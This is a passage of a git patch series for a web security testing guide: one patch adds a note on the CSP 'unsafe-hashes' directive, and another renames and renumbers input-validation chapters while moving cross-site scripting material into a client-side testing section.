From 4434ff6c8ee435ede1adeb607a9a96bf04b52060 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Sun, 3 Jul 2022 12:56:39 +0530 Subject: [PATCH 01/37] insecure configuration of CSP when using the unsafe-hashes directive --- .../12-Test_for_Content_Security_Policy.md | 1 + 1 file changed, 1 insertion(+) diff --git a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md index 7e5c75977c..a1d69d06a0 100644 --- a/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md +++ b/document/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/12-Test_for_Content_Security_Policy.md @@ -20,6 +20,7 @@ To test for misconfigurations in CSPs, look for insecure configurations by exami - `unsafe-inline` directive enables inline scripts or styles making the applications susceptible to XSS attacks. - `unsafe-eval` directive allows `eval()` to be used in the application. +- `unsafe-hashes` directive allows us to provide inline code, by computing a SHA-256 hash of our code. - Resources such as scripts can be allowed to be loaded from any origin by the use wildcard (`*`) source. - Also consider wildcards based on partial matches, such as: `https://*` or `*.cdn.com`. - Consider whether allow listed sources provide JSONP endpoints which might be used to bypass CSP or same-origin-policy. From 17f7b86746d7507a6e8f3816354bb2af0235debf Mon Sep 17 00:00:00 2001 
From: Manindar Mohan Date: Fri, 30 Jun 2023 15:04:43 +0530 Subject: [PATCH 02/37] Moved all XSS to chapter 11, client-side testing, and have one big section for XSS and then going into more tests for other types of testing. --- ... => 01-Testing_for_HTTP_Verb_Tampering.md} | 2 +- ...2-Testing_for_HTTP_Parameter_Pollution.md} | 2 +- ...ion.md => 03-Testing_for_SQL_Injection.md} | 2 +- ...r_Oracle.md => 03.1-Testing_for_Oracle.md} | 0 ...for_MySQL.md => 03.2-Testing_for_MySQL.md} | 0 ...rver.md => 03.3-Testing_for_SQL_Server.md} | 0 ...stgreSQL.md => 03.4-Testing_PostgreSQL.md} | 0 ...ccess.md => 03.5-Testing_for_MS_Access.md} | 0 ...md => 03.6-Testing_for_NoSQL_Injection.md} | 0 ...n.md => 03.7-Testing_for_ORM_Injection.md} | 0 ...ide.md => 03.8-Testing_for_Client-side.md} | 0 ...on.md => 04-Testing_for_LDAP_Injection.md} | 2 +- ...ion.md => 05-Testing_for_XML_Injection.md} | 2 +- ...ion.md => 06-Testing_for_SSI_Injection.md} | 2 +- ...n.md => 07-Testing_for_XPath_Injection.md} | 2 +- ... => 08-Testing_for_IMAP_SMTP_Injection.md} | 2 +- ...on.md => 09-Testing_for_Code_Injection.md} | 2 +- ....md => 09.1-Testing_for_File_Inclusion.md} | 0 ...md => 10-Testing_for_Command_Injection.md} | 2 +- ...w.md => 11-Testing_for_Buffer_Overflow.md} | 2 +- ...12-Testing_for_Format_String_Injection.md} | 2 +- ...13-Testing_for_Incubated_Vulnerability.md} | 2 +- ...4-Testing_for_HTTP_Splitting_Smuggling.md} | 2 +- ... 
15-Testing_for_HTTP_Incoming_Requests.md} | 2 +- ...> 16-Testing_for_Host_Header_Injection.md} | 2 +- ...ing_for_Server-side_Template_Injection.md} | 2 +- ...esting_for_Server-Side_Request_Forgery.md} | 2 +- ...t.md => 19-Testing_for_Mass_Assignment.md} | 2 +- .../01-Testing_for_Cross_Site_Scripting.md | 109 ++++++++++++++++++ ...ing_for_Reflected_Cross_Site_Scripting.md} | 4 - ...esting_for_Stored_Cross_Site_Scripting.md} | 4 - ...ing_for_DOM-based_Cross_Site_Scripting.md} | 17 ++- ...or_Self_DOM_Based_Cross_Site_Scripting.md} | 0 .../images/Alert.png | Bin .../images/Stored_input_example.jpg | Bin .../images/Stored_xss_example.jpg | Bin .../images/XSS_Example1.png | Bin .../images/XSS_Example2.png | Bin 38 files changed, 135 insertions(+), 37 deletions(-) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{03-Testing_for_HTTP_Verb_Tampering.md => 01-Testing_for_HTTP_Verb_Tampering.md} (93%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{04-Testing_for_HTTP_Parameter_Pollution.md => 02-Testing_for_HTTP_Parameter_Pollution.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05-Testing_for_SQL_Injection.md => 03-Testing_for_SQL_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.1-Testing_for_Oracle.md => 03.1-Testing_for_Oracle.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.2-Testing_for_MySQL.md => 03.2-Testing_for_MySQL.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.3-Testing_for_SQL_Server.md => 03.3-Testing_for_SQL_Server.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.4-Testing_PostgreSQL.md => 03.4-Testing_PostgreSQL.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.5-Testing_for_MS_Access.md => 03.5-Testing_for_MS_Access.md} 
(100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.6-Testing_for_NoSQL_Injection.md => 03.6-Testing_for_NoSQL_Injection.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.7-Testing_for_ORM_Injection.md => 03.7-Testing_for_ORM_Injection.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{05.8-Testing_for_Client-side.md => 03.8-Testing_for_Client-side.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{06-Testing_for_LDAP_Injection.md => 04-Testing_for_LDAP_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{07-Testing_for_XML_Injection.md => 05-Testing_for_XML_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{08-Testing_for_SSI_Injection.md => 06-Testing_for_SSI_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{09-Testing_for_XPath_Injection.md => 07-Testing_for_XPath_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{10-Testing_for_IMAP_SMTP_Injection.md => 08-Testing_for_IMAP_SMTP_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{11-Testing_for_Code_Injection.md => 09-Testing_for_Code_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{11.1-Testing_for_File_Inclusion.md => 09.1-Testing_for_File_Inclusion.md} (100%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{12-Testing_for_Command_Injection.md => 10-Testing_for_Command_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{13-Testing_for_Buffer_Overflow.md => 11-Testing_for_Buffer_Overflow.md} (85%) rename 
document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{13-Testing_for_Format_String_Injection.md => 12-Testing_for_Format_String_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{14-Testing_for_Incubated_Vulnerability.md => 13-Testing_for_Incubated_Vulnerability.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{15-Testing_for_HTTP_Splitting_Smuggling.md => 14-Testing_for_HTTP_Splitting_Smuggling.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{16-Testing_for_HTTP_Incoming_Requests.md => 15-Testing_for_HTTP_Incoming_Requests.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{17-Testing_for_Host_Header_Injection.md => 16-Testing_for_Host_Header_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{18-Testing_for_Server-side_Template_Injection.md => 17-Testing_for_Server-side_Template_Injection.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{19-Testing_for_Server-Side_Request_Forgery.md => 18-Testing_for_Server-Side_Request_Forgery.md} (99%) rename document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/{20-Testing_for_Mass_Assignment.md => 19-Testing_for_Mass_Assignment.md} (99%) create mode 100644 document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md => 11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md} (99%) rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.md => 11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md} (99%) rename 
document/4-Web_Application_Security_Testing/11-Client-side_Testing/{01-Testing_for_DOM-based_Cross_Site_Scripting.md => 01.3-Testing_for_DOM-based_Cross_Site_Scripting.md} (97%) rename document/4-Web_Application_Security_Testing/11-Client-side_Testing/{01.1-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md => 01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md} (100%) rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/Alert.png (100%) rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/Stored_input_example.jpg (100%) rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/Stored_xss_example.jpg (100%) rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/XSS_Example1.png (100%) rename document/4-Web_Application_Security_Testing/{07-Input_Validation_Testing => 11-Client-side_Testing}/images/XSS_Example2.png (100%) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_HTTP_Verb_Tampering.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_HTTP_Verb_Tampering.md similarity index 93% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_HTTP_Verb_Tampering.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_HTTP_Verb_Tampering.md index 5c47fbcbc4..6b919f4940 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_HTTP_Verb_Tampering.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_HTTP_Verb_Tampering.md 
@@ -2,6 +2,6 @@ |ID | |------------| -|WSTG-INPV-03| +|WSTG-INPV-01| This content has been merged into: [Test HTTP Methods](../02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.md) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md index d2eb39b136..64b6a048e3 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_HTTP_Parameter_Pollution.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-04| +|WSTG-INPV-02| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md index d4a8620dd9..26ca0c5afb 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-05| +|WSTG-INPV-03| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.1-Testing_for_Oracle.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.2-Testing_for_MySQL.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.3-Testing_for_SQL_Server.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.3-Testing_for_SQL_Server.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.4-Testing_PostgreSQL.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.4-Testing_PostgreSQL.md 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.5-Testing_for_MS_Access.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.5-Testing_for_MS_Access.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.6-Testing_for_NoSQL_Injection.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.6-Testing_for_NoSQL_Injection.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.7-Testing_for_ORM_Injection.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.7-Testing_for_ORM_Injection.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.8-Testing_for_Client-side.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.8-Testing_for_Client-side.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.8-Testing_for_Client-side.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03.8-Testing_for_Client-side.md 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_LDAP_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_LDAP_Injection.md index f54732cdba..959cdb2f60 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_LDAP_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-06| +|WSTG-INPV-04| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_XML_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_XML_Injection.md index 0851f313b1..c5ce735377 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_XML_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-07| +|WSTG-INPV-05| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md index 31368ae723..18770d07bf 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_SSI_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-08| +|WSTG-INPV-06| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XPath_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XPath_Injection.md index 03e97236b0..03faadfbef 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XPath_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-09| +|WSTG-INPV-07| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md index d46bac9b01..6b856ced34 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_IMAP_SMTP_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-10| +|WSTG-INPV-08| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_Code_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_Code_Injection.md index 6cd3381630..3172c942b2 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_Code_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-11| +|WSTG-INPV-09| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md similarity index 100% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09.1-Testing_for_File_Inclusion.md diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md index 260654ff24..afd6456cc1 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-12| +|WSTG-INPV-10| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Buffer_Overflow.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Buffer_Overflow.md similarity index 85% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Buffer_Overflow.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Buffer_Overflow.md index 9c1ba53a6a..c836db469a 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Buffer_Overflow.md 
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Buffer_Overflow.md @@ -2,6 +2,6 @@ |ID | |------------| -|WSTG-INPV-13| +|WSTG-INPV-11| This content has been removed diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md index 94ffcd128d..83c8fab689 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-13| +|WSTG-INPV-12| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md index 1decb9bef8..90a0c49897 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-14| +|WSTG-INPV-13| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md index 9e59abd0a6..cac1f31858 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-15| +|WSTG-INPV-14| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Incoming_Requests.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Incoming_Requests.md index 4634b43736..06387a92a4 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Incoming_Requests.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-16| +|WSTG-INPV-15| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md index 71ae8f4006..f4ddb93132 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-17| +|WSTG-INPV-16| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md index b3995bb444..f4e49e31f9 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-18| +|WSTG-INPV-17| ## Summary 
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md index f1b57d958e..21047359fd 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-19| +|WSTG-INPV-18| ## Summary diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md similarity index 99% rename from document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md rename to document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md index 1f7e2cc84d..4b52c61732 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/20-Testing_for_Mass_Assignment.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-INPV-20| +|WSTG-INPV-19| ## Summary diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md new file mode 100644 index 0000000000..3a3979c2c1 
--- /dev/null +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md 
